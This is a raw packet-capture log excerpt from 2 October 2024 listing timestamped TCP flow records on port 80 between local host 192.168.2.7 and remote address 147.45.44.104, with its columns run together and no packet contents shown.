                                                                                                            Oct 2, 2024 08:54:59.488358021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.488394022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.488425970 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.488564968 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.488600969 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.488714933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.488725901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.488796949 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.488879919 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489059925 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489069939 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489079952 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489097118 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.489234924 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.489425898 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489437103 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489447117 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489456892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489468098 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489479065 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.489496946 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.489496946 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.489557028 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.490185022 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.490195990 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.490205050 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.490215063 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.490225077 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.490236044 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.490247965 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.490257025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.490263939 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.490263939 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.490293026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.490293026 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.491137981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.491148949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.491158962 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.491168976 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.491178989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.491187096 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.491192102 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.491203070 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.491209030 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.491219044 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.491236925 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.491410017 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.492048979 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.492059946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.492069960 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.492080927 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.492091894 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.492103100 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.492108107 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.492108107 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.492114067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.492141008 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.493031025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493042946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493051052 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493062019 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493072033 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493083000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493083954 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.493083954 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.493093967 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493104935 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493140936 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.493140936 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.493922949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493935108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493943930 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493954897 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493963957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493976116 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.493984938 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.493984938 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.494029045 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.494543076 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.494553089 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.494564056 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.494575024 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.494585991 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.494597912 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.494597912 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.494719982 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.495110035 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495120049 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495130062 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495140076 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495150089 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495161057 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495172024 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495178938 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.495182991 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495201111 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495210886 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.495234966 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.495234966 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.495296955 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.496033907 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496045113 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496054888 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496063948 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496073961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496083975 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496094942 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496105909 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496117115 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496119976 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.496119976 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.496126890 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.496176958 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.496176958 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.497009039 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497019053 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497028112 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497040033 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497051001 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497060061 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497075081 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497083902 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497087955 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.497087955 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.497096062 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497108936 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.497128010 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.497128963 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.497683048 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.497988939 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498002052 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498011112 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498019934 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498028994 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498039961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498049021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498049021 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.498061895 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498071909 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498083115 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.498109102 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.498109102 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.498745918 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.568062067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568087101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568216085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568226099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568269968 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.568269968 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.568377018 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568388939 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568398952 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568412066 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568450928 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.568450928 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.568711996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568722963 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568732023 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568948030 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568958044 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568969011 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568979025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.568983078 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.568983078 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.569334984 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.569375038 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.569375038 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.773883104 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.773941994 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.773953915 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774035931 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774179935 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774190903 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774202108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774213076 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774223089 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774247885 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774247885 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774291039 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774733067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774743080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774766922 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774777889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774789095 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774796009 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774805069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774807930 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774816990 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774827003 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774837971 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.774861097 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.774861097 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775620937 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775631905 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775641918 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775651932 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775661945 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775672913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775681973 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775681973 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775682926 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775695086 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775706053 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.775719881 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775719881 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.775754929 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.776518106 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776530981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776540995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776551008 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776561022 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776571035 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776596069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776607037 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776607037 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.776607037 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.776617050 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.776645899 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.777426004 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777442932 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777452946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777462959 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777472973 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777482033 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.777484894 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777496099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777506113 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777517080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777528048 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.777528048 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.777543068 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.777585030 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778306007 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778316975 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778327942 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778337955 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778348923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778367043 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778367043 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778376102 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778388023 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778398037 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778409004 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.778413057 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778424978 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.778467894 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.779225111 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779237032 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779247999 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779258966 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779268980 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779280901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779292107 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779301882 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779314995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779314995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.779314995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.779326916 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.779377937 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.779377937 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780097961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780109882 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780122042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780133009 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780142069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780158043 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780169964 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780179024 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780179977 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780180931 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780193090 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780199051 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780209064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.780246973 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780246973 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.780999899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781013012 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781024933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781035900 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781068087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781078100 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781078100 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781079054 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781091928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781105042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781114101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781116962 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781141043 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781641960 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781653881 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781668901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781676054 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781682968 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781688929 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.781694889 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781733036 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.781733036 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782186031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782197952 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782210112 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782221079 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782232046 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782243967 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782253981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782262087 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782262087 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782265902 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782279015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782289028 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782299042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.782310009 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782330990 CEST8049702147.45.44.104192.168.2.7
